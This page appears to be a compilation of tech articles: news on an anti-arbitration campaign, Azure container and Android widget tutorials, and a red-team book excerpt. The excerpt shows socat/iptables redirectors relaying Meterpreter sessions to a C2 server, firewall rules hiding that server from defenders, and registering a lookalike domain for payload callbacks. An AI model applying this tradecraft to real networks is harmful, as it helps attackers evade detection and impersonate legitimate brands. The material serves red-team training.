How-To Tutorials


Googlers launch industry-wide awareness campaign to fight against forced arbitration

Natasha Mathur
17 Jan 2019
6 min read
A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called 'Googlers for Ending Forced Arbitration', shared information about arbitration on its Twitter and Instagram accounts throughout the day.

https://twitter.com/endforcedarb/status/1084813222505410560

As part of the campaign, the group tweeted yesterday that in a survey of employees at 30+ tech companies and 10+ common temp/contractor suppliers in the industry, none of the companies could meet the three primary criteria needed for a transparent workplace. The three basic criteria are: an optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration proceedings confidential.

The group shared some hard facts about arbitration and also busted some myths. Let's have a look at some of the key highlights from yesterday's campaign.

At least 60 million Americans are forced to use arbitration

The group states that the use of forced arbitration policies has grown significantly in the past seven years. Over 65% of companies with 1,000 or more employees now have mandatory arbitration procedures. Employees don't have the option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones affected the most by this practice.

How employers use forced arbitration

Forced arbitration is extremely unfair

Arbitration firms hired by companies usually favour the companies over their employees, out of fear of not being hired again by the employer if the firm decides in favour of the employee. The group states that employees are 1.7 times more likely to win in federal courts and 2.6 times more likely to win in state courts than in arbitration.

There are no public filings of complaint details, meaning that the company doesn't have to answer to anyone regarding the issues within the organization. The company can also limit its obligation to disclose the evidence that you need to prove your case.

Arbitration hearings happen behind closed doors within a company

An arbitration hearing involves just the employee and their lawyer, the other party and their lawyer, and a panel of one to three arbitrators. Each party gets to pick one arbitrator, who is ultimately hired by the employer. However, a single-arbitrator panel is usually used, as a three-arbitrator panel costs five times more than a single arbitrator, as per the American Arbitration Association.

Forced arbitration requires employees to sign away their right to class action lawsuits at the start of their employment

The group states that, regardless of whether a legal dispute exists, forced arbitration bans employees from coming together as a group, both in arbitration and in class action lawsuits. Most employers also enforce a "gag rule", which restricts employees from even talking about their experience with the arbitration policy. Certain companies do give you the option to opt out of forced arbitration using an opt-out form, but this comes with a time constraint that depends on your agreement with the company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration.
Arbitration opt-out option

JAMS and AAA are among the top arbitration organizations used by major tech giants

JAMS (Judicial Arbitration and Mediation Services) is a private company whose services are used by employers such as Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators. Similarly, AAA, the American Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in AAA have an overall composition of 24% women and minorities. AAA is one of the largest arbitration organizations and is used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma.

Katherine Stone, a professor at UCLA's law school, states that the procedures followed by these arbitration firms don't allow much discovery. This means that these firms don't usually permit depositions or various kinds of document exchange before the hearing. "So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can't learn about the experience of others," says Stone.

Female workers and African-American workers are the most likely to suffer from forced arbitration

58% of female workers and 59% of African American workers face mandatory arbitration, depending on the workgroup. For instance, in the construction industry, a highly male-dominated industry, forced arbitration is imposed at the lowest rate. But in the education and health industries, which have a majority-female workforce, the imposition rate of forced arbitration is high.

Forced arbitration rate among different workgroups

The Supreme Court has gradually allowed companies to expand arbitration to employees and consumers

The group states that the 1925 Federal Arbitration Act (FAA) legalized arbitration between shipping companies for settling commercial disputes. The Supreme Court, however, gradually expanded this practice to employment and consumer contracts as well.

Supreme Court decisions

Apart from sharing these facts, the group also shed light on the dos and don'ts that employees should follow under forced arbitration clauses.

Dos and Don'ts

The social media campaign by Googlers for Ending Forced Arbitration represents an upsurge in strength and courage among employees within the tech industry, as not just Google employees but also employees from other tech companies shared their experiences of forced arbitration. As part of the campaign, the group researched academic institutions, labour attorneys, advocacy groups, and the contracts of around 30 major tech companies. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account.

Shareholders sue Alphabet's board members for protecting senior execs accused of sexual harassment
Recode Decode #GoogleWalkout interview shows why data and evidence don't always lead to right decisions in even the world's most data-driven company
Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley


Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

Amrata Joshi
16 Jan 2019
11 min read
A redirector server is responsible for redirecting all the communication to the C2 server. Let's explore the basics of redirector using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload is delivered to the target and has been executed successfully. This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting and much more. To follow are the things that will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2s IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation. This is displayed in an architectural format in order to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of our C2. Refer to the following image for a clear understanding of this process: This is currently the IP information of our redirector and C2: Redirector IP: 35.153.183.204 C2 IP: 54.166.109.171 Assuming that socat is installed on the redirector server, we will execute the following command to forward all the communications on the incoming port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change. This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We might now notice something different about the following image as the source IP is redirector instead of the target server: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP and neither does the Blue team. Now the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in such a way that allows us to protect it from outside reconnaissance (recon) and attacks. Obfuscating C2 securely To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that our C2 server is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2. 
To begin, execute the following UFW commands to add firewall rules for the C2:

sudo ufw allow 22
sudo ufw allow 55553
sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp
sudo ufw allow out to 35.153.183.204 port 8080 proto tcp
sudo ufw deny out to any

These commands need to be executed; the result is shown in the following screenshot:

In addition, execute the following ufw commands to add firewall rules for the redirector as well:

sudo ufw allow 22
sudo ufw allow 8080

These commands need to be executed; the result is shown in the following screenshot:

Once the ruleset is in place, this can be described as follows: if we try to perform a port scan on the C2 now, the ports will be shown as filtered. Furthermore, our C2 is now only accessible from our redirector. Let's also confirm this by doing a port scan on our C2 from the redirector server:

Short-term and long-term redirectors

Short-term (ST) C2 servers, also called short-haul C2 servers, are the C2 servers on which the beaconing process continues. Whenever a system in the targeted organization executes our payload, it will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This redirector handles the connections to the ST-C2 server, which is used for executing commands on the target server in real time. ST and LT redirectors can get caught easily during the course of an engagement because they're placed at the front.

A long-term (LT), also known as long-haul, C2 server is where the callbacks from the target server arrive every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors. When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector.

A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png

Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors.

Redirection methods

There are two ways in which we can perform redirection:

Dumb pipe redirection
Filtration/smart redirection

Dumb pipe redirection

Dumb pipe redirectors blindly forward the network traffic from the target server to our C2, or vice versa. This type of redirector is useful for quick configuration and setup, but it lacks a level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but it won't distract the defenders of the organization from investigating our setup. We can perform dumb pipe redirection using socat or iptables (a hedged socat sketch is shown right after this section). In both cases, the network traffic will be redirected either to our ST-C2 server or our LT-C2 server.
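The socat commands themselves appear only as screenshots in the original tutorial; the following is a minimal, hedged sketch of such a dumb pipe forwarder, assuming the redirector listens on 8080/tcp and the C2 is the 54.166.109.171 host used earlier:

# Install socat on the redirector if it is not already present
sudo apt-get install -y socat
# Listen on 8080/tcp and blindly forward every incoming connection to the C2
socat TCP4-LISTEN:8080,fork,reuseaddr TCP4:54.166.109.171:8080

Running the listener inside tmux, screen, or a systemd unit keeps the pipe alive if the SSH session to the redirector drops.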
Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png

The command shown in the following image (essentially the socat one-liner sketched above) configures a dumb pipe redirector that redirects to our C2 on port 8080/tcp:

The following are the commands that we can execute to perform dumb pipe redirection using iptables instead:

iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

These commands need to be executed; the result is shown in the following screenshot (ignore the sudo error here, which occurred because of the hostname we changed):

Whether we use socat or iptables, the result is the same: the network traffic arriving on the redirector's interface is forwarded to our C2.

Filtration/smart redirection

Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection always processes the network traffic based on the rules defined by the red team before forwarding it to the C2. With smart redirection, if the traffic is not valid C2 traffic, it is either forwarded to a legitimate website or simply dropped. Only if the network traffic is meant for our C2 does the redirection take place:

To configure smart redirection, we need to install and configure a web service. Let's install the Apache server on the redirector using the sudo apt install apache2 command. We also need to execute the following commands in order to enable the Apache rewrite and proxy modules, and to enable SSL:

sudo apt-get install apache2
sudo a2enmod ssl rewrite proxy proxy_http
sudo a2ensite default-ssl.conf
sudo service apache2 restart

These commands need to be executed; the result is shown in the following screenshot:

We also need to adjust the Apache configuration: look for the Directory directive and change AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host settings and add them to wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf). After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection.

Domain fronting

According to https://resources.infosecinstitute.com/domain-fronting/: "Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or they may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain."

To make a start with domain fronting, we need to get a domain that is similar to our target organization's. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue. We need to install some required Python packages before continuing further.
This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will fetch for the expired and deleted domains that have a blank name because we didn't provide one: Let's check for the help option to see how we can use domainhunter: Let's search for a keyword to look for the domains related to the specified keyword. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the preceding-mentioned domains are free to register. Let's select wwwpacktpub.tk as follows: We can again check the availability of www.packtpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership of this: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we have obtained this, we can set the domain in the stager creation and get the back connection from wwwpacktpub.tk: In this article, we have learned the basics of redirectors and we have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.  This article also covered short-term and long-term C2s and much more. To know more about advanced penetration testing tools and more check out the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. Introducing numpywren, a system for linear algebra built on a serverless architecture Fortnite server suffered a minor outage, Epic Games was quick to address the issue Windows Server 2019 comes with security, storage and other changes


Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

Melisha Dsouza
15 Jan 2019
12 min read
The next level of virtualization is containers, as they provide a better solution than virtual machines within Hyper-V: containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility, along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications.

This tutorial combines the above concepts and describes how to design and implement containers, and how to choose the proper solution for orchestrating them. You will get an overview of how Azure can help you implement services based on containers and get rid of traditional virtualization overhead, with redundant OS resources that need to be managed, updated, backed up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following:

A computer with an internet browser
An Azure subscription (if not available, a trial could work too)

With Azure, you have the option to order a container directly in Azure as an Azure Container Instance (ACI) or to use a managed Azure solution with Kubernetes as the orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub.

Azure Container Registry (ACR)

If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry. This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Registry (ACR) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies.

When you create your container registry, you will need to define the following:

The registry name (ending with azurecr.io)
The resource group the registry sits in
The Azure location
The admin user (if you need to log in to the registry using an account)
The SKU: Basic, Standard, or Premium

The following table details the features and limits of the Basic, Standard, and Premium service tiers:

Resource                    Basic     Standard   Premium
Storage                     10 GiB    100 GiB    500 GiB
Max image layer size        20 GiB    20 GiB     50 GiB
ReadOps per minute          1,000     3,000      10,000
WriteOps per minute         100       500        2,000
Download bandwidth (MBps)   30        60         100
Upload bandwidth (MBps)     10        20         50
Webhooks                    2         10         100
Geo-replication             N/A       N/A        Supported

Switching between the different SKUs is supported and can be done using the portal, PowerShell, or the CLI. If you are still on a classic ACR, the first step would be to upgrade to a managed registry.

Azure Container Instances

By running your workloads in ACI, you don't have to set up a management infrastructure for your containers; you can simply focus on designing and building the applications (a hedged CLI sketch of these settings follows below).
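The walkthroughs below use the Azure portal; for reference, here is a hedged Azure CLI sketch of the same registry and container instance settings. The resource group, registry, and DNS names are placeholders, not values from the book:

az group create --name demo-containers-rg --location westeurope
# Container registry; the SKU can be Basic, Standard, or Premium, and the admin user can be enabled for account-based login
az acr create --resource-group demo-containers-rg --name demoregistry12345 --sku Standard --admin-enabled true
# A simple container instance with the per-container resources discussed above (cores, memory, ports, restart policy)
az container create --resource-group demo-containers-rg --name demo-aci \
  --image mcr.microsoft.com/azuredocs/aci-helloworld \
  --os-type Linux --cpu 1 --memory 1.5 --ports 80 \
  --dns-name-label demo-aci-sample --restart-policy Always
# Retrieve the FQDN to open the sample application in a browser
az container show --resource-group demo-containers-rg --name demo-aci --query ipAddress.fqdn --output tsv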
Creating your first container in Azure Let's create a first simple container in Azure using the portal:  Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties like: We will need to define the Azure container name. Of course, this needs to be unique in your environment. Then, we will need to define the source of the image and to which resource group and region it should be deployed within Azure. As already mentioned, containers can reside on Windows and Linux, because this needs to be defined at first. Afterwards, we will need to define the resources per container: Cores Memory Ports Port protocol Restart policy (if the container went offline) After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them. Azure Marketplace containers In the public Azure Marketplace, you can find existing container images that just can be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always good to look at first. Before starting with this, we will need to check if the required resource providers are enabled on the subscription you are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: At first, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, version) need to be defined in the following dialog: Now that the registry is being created, we will need to update the permission settings, also called enable admin registry. This can be done with the Admin user Enable button as shown in the following screenshot:  Regarding the SKU, this is just another point where we can set the priority and define performance. This may take some minutes to be enabled. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: At first, we will need to choose the corresponding container from the registry; right-click the tag version from the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled are some defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure. Container orchestration One of the most interesting topics with regard to containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin off an additional container to load-balance the traffic. This could even be done if we needed to scale down. 
The concept of container orchestration Regarding this technology, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following: Docker swarm DC/OS Kubernetes Kubernetes is the most-used one, and therefore could be deployed as a service in most public cloud services, such as in Azure. It provides the following features: Automated container placement: On the container hosts, to best spread the load between them Self-healing: For failed containers, restarting them in a proper way Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load Service discovery and load balancing: By providing IP-addresses to containers and managing DNS registrations Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature as updated containers that are newly rolled-out are just rolled back if something goes wrong Configuration management: By updating secrets and configurations without the need to fully rebuild the container itself Azure Kubernetes Service (AKS) Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. In general, these tasks are one-off costs and therefore it would be best to not waste these resources. In Azure today, there is a feature called AKS, where K emphasizes that it is a managed Kubernetes service. For AKS, there is no charge for Kubernetes masters, you just have to pay for the nodes that are running the containers. Before you start, you will have to fulfill the following prerequisites: An Azure account with an active subscription Azure CLI installed and configured Kubernetes command-line tool, kubectl, installed Make sure that the Azure subscription you use has these required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and choose to create your AKS deployment for your tenant. The following parameters need to be defined: Resource group for the deployment Kubernetes cluster name Azure region Kubernetes version DNS prefix Then,  hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose and existing one, as AKS needs a service principal to run the deployment. In addition, you could enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster into an existing VNET, or create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: The following is the source from which to set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer depending on the chosen feature, and scale: After the deployment has finished, the Kubernetes dashboard is available. 
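The portal-based deployment described above can also be approximated from the Azure CLI. The following is a minimal, hedged sketch; the resource group, cluster name, and node count are placeholders, and the monitoring add-on corresponds to the Log Analytics option on the Monitoring tab:

# Create the AKS cluster; only the worker nodes are billed, the managed masters are free
az group create --name demo-aks-rg --location westeurope
az aks create --resource-group demo-aks-rg --name demo-aks-cluster \
  --node-count 3 --enable-addons monitoring --generate-ssh-keys
# Fetch credentials for kubectl and verify that the nodes are ready
az aks get-credentials --resource-group demo-aks-rg --name demo-aks-cluster
kubectl get nodes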
You can view the Kubernetes dashboard by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot:

As you can see in the preceding screenshot, there are four steps to open the dashboard. First, we need to install the most current version of the Azure CLI using the statement mentioned in the following screenshot: Afterward, the AKS command-line tool, kubectl.exe, needs to be installed. Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window:

The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment from a GUI. If a new Kubernetes version becomes available, you can easily update the cluster from the Azure portal yourself with one click, as shown in the following screenshot:

If you need to scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts with 3 vCPUs and 10.5 GB RAM per host is currently possible. You can now upload your containers to your AKS-managed Docker environment and have a hugely scalable infrastructure with a minimum of administrative tasks and implementation time.

If you need to monitor AKS, integration with Azure monitoring is built in. By clicking the Monitor container health link, you will be directed to the following overview:

The Nodes tab provides the following information per node: this not only gives a brief overview of the health status, but also shows the number of containers and the load on the node itself. The Controllers view provides detailed information on the AKS controllers, their services, status, and uptime. And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included). By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them into your custom portal:

To get everything up and running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS:

Prepare the AKS app
Create the container registry
Create the Kubernetes cluster
Run the application in AKS
Scale the application in AKS
Update the application in AKS

AKS has the following service quotas and limits:

Resource                                                 Default limit
Max nodes per cluster                                    100
Max pods per node (basic networking with kubenet)        110
Max pods per node (advanced networking with Azure CNI)   301
Max clusters per subscription                            100

As you have seen, AKS in Azure provides great features with a minimum of administrative tasks.

Summary

In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. Basically, the concept of containers is a great idea and surely the next step in virtualization for applications. Setting up the environment manually is quite complex, but by using the PaaS approach, the setup procedure is quite simple (thanks to automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out the book Implementing Azure Solutions - Second Edition.

Microsoft Connect(); 2018 Azure updates: Azure Pipelines extension for Visual Studio Code, GitHub releases and much more!
Introducing Grafana's 'Loki' (alpha), a scalable HA multi-tenant log aggregator for cloud natives; optimized for Grafana, Prometheus and Kubernetes
DigitalOcean launches its Kubernetes-as-a-service at KubeCon+CloudNativeCon to ease running containerized apps


Implementing a home screen widget and search bar on Android [Tutorial]

Natasha Mathur
14 Jan 2019
12 min read
In this tutorial, we'll look at how to create a Home screen App Widget that users can add to their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, and more, to help you develop applications using the latest Android framework.

Creating a Home screen widget

Before we dig into the code for creating an App Widget, let's cover the basics. There are three required components and one optional one:

The AppWidgetProviderInfo file: An XML resource.
The AppWidgetProvider class: A Java class.
The View layout file: A standard layout XML file, with some restrictions.
The App Widget configuration Activity (optional): An Activity the OS will launch when placing the widget, to provide configuration options.

The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on a Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory. Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes:

minWidth: The default width when placed on the Home screen
minHeight: The default height when placed on the Home screen
updatePeriodMillis: The onUpdate() polling interval (in milliseconds)
initialLayout: The App Widget layout
previewImage (optional): The image shown when browsing App Widgets
configure (optional): The Activity to launch for configuration settings
resizeMode (optional): Flags indicating the resizing options: horizontal, vertical, none
minResizeWidth (optional): The minimum width allowed when resizing
minResizeHeight (optional): The minimum height allowed when resizing
widgetCategory (optional): Android 5+ only supports Home screen widgets

The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the App Widget in the manifest. As a BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to the ones applicable to an App Widget. The AppWidgetProvider class exposes the following methods:

onUpdate(): Called when the widget is initially created and at the specified interval.
onAppWidgetOptionsChanged(): Called when the widget is initially created and any time its size changes.
onDeleted(): Called any time a widget is removed.
onEnabled(): Called the first time a widget is placed (it isn't called when adding second and subsequent widgets).
onDisabled(): Called when the last widget is removed.
onReceive(): Called on every event received, including the preceding ones. Usually not overridden, as the default implementation only dispatches the applicable events.

The last required component is the layout. An App Widget uses a Remote View, which only supports a subset of the available layouts: AdapterViewFlipper, FrameLayout, GridLayout, GridView, LinearLayout, ListView, RelativeLayout, StackView, and ViewFlipper. It supports the following widgets: AnalogClock, Button, Chronometer, ImageButton, ImageView, ProgressBar, TextClock, and TextView.

With App Widget basics covered, it's now time to start coding (a minimal, hedged provider sketch follows below; the recipe then builds the actual files step by step).
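The following is a minimal sketch of an AppWidgetProvider in Java. It is not the recipe's HomescreenWidgetProvider verbatim; the layout (R.layout.widget), view ID (R.id.analogClock), and target activity (MainActivity) are illustrative placeholders, but it shows the onUpdate()/RemoteViews/PendingIntent pattern described above:

import android.app.PendingIntent;
import android.appwidget.AppWidgetManager;
import android.appwidget.AppWidgetProvider;
import android.content.Context;
import android.content.Intent;
import android.widget.RemoteViews;

public class SketchWidgetProvider extends AppWidgetProvider {
    @Override
    public void onUpdate(Context context, AppWidgetManager appWidgetManager, int[] appWidgetIds) {
        // onUpdate() receives every widget ID created by this provider, so iterate over all of them
        for (int appWidgetId : appWidgetIds) {
            // An App Widget is a Remote View, built from the package name and the widget layout
            RemoteViews views = new RemoteViews(context.getPackageName(), R.layout.widget);
            // Open our activity when the (hypothetical) clock view is tapped
            Intent intent = new Intent(context, MainActivity.class);
            PendingIntent pendingIntent =
                    PendingIntent.getActivity(context, 0, intent, PendingIntent.FLAG_UPDATE_CURRENT);
            views.setOnClickPendingIntent(R.id.analogClock, pendingIntent);
            // Push the updated RemoteViews to the launcher
            appWidgetManager.updateAppWidget(appWidgetId, views);
        }
    }
}

Because the recipe sets updatePeriodMillis to zero, onUpdate() is still called once when the widget is first placed, which is enough to wire up the click handler.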
Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock, which, when pressed, opens our activity. The following screenshot shows the widget in the widget list when adding it to the Home screen: The purpose of the image is to show how to add a widget to the home screen The widget list's appearance varies by the launcher used. Here's a screenshot showing the widget after it is added to the Home screen: Getting ready Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type. How to do it... We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps: Create a new file in res/layout called widget.xml using the following XML: Create a new directory called XML in the resource directory. The final result will be res/xml. Create a new file in res/xml called appwidget_info.xml using the following XML: If you cannot see the new XML directory, switch from Android view to Project view in the Project panel drop-down. Create a new Java class called HomescreenWidgetProvider, extending from AppWidgetProvider. Add the following onUpdate() method to the HomescreenWidgetProvider class: Add the HomescreenWidgetProvider to the AndroidManifest using the following XML declaration within the <application> element: Run the program on a device or emulator. After first running the application, the widget will then be available to add to the Home screen. How it works... Our first step is to create the layout file for the widget. This is a standard layout resource with the restrictions based on the App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an Analog Clock widget, this is where you'd want to expand the functionality based on your application needs. The XML resource directory serves to store the AppWidgetProviderInfo, which defines the default widget settings. The configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image to show a functioning widget and sizing options. The updatePeriodMillis attribute sets the update frequency. Since the update will wake up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional Settings Activity is useful by letting the user decide.) The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating so we set the polling to zero. The update is still called when initially placing the widget. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of AppWidgets, we'll explain this in some detail. First, it's worth noting that onUpdate() will occur only once each polling interval for all the widgets is created by this provider. (All additional widgets created will use the same cycle as the first widget created.) 
This explains the for loop, as we need it to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an App Widget is a Remote View. Therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we can attach the pending intent to the clock view using setOnClickPendingIntent(). We then call the AppWidgetManager's updateAppWidget() method to apply the changes we made. The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>. Most App Widgets will likely want to handle the Update event, as ours does. The other item to note in the declaration is the following line: This tells the system where to find our configuration file.

Adding Search to the Action Bar

Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern for providing a consistent user experience. The following screenshot shows the initial appearance of the Search icon in the Action Bar: The following screenshot shows how the Search option expands when pressed:

If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your user interface and properly configure the Search Manager API.

Getting ready

Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type.

How to do it...

To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file. To get started, open the strings.xml file in res/values and follow these steps:

1. Add the following string resources:
2. Create the menu directory: res/menu.
3. Create a new menu resource called menu_search.xml in res/menu using the following XML:
4. Open MainActivity and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager:

@Override
public boolean onCreateOptionsMenu(Menu menu) {
    MenuInflater inflater = getMenuInflater();
    inflater.inflate(R.menu.menu_search, menu);
    SearchManager searchManager = (SearchManager) getSystemService(Context.SEARCH_SERVICE);
    MenuItem searchItem = menu.findItem(R.id.menu_search);
    SearchView searchView = (SearchView) searchItem.getActionView();
    searchView.setSearchableInfo(searchManager.getSearchableInfo(getComponentName()));
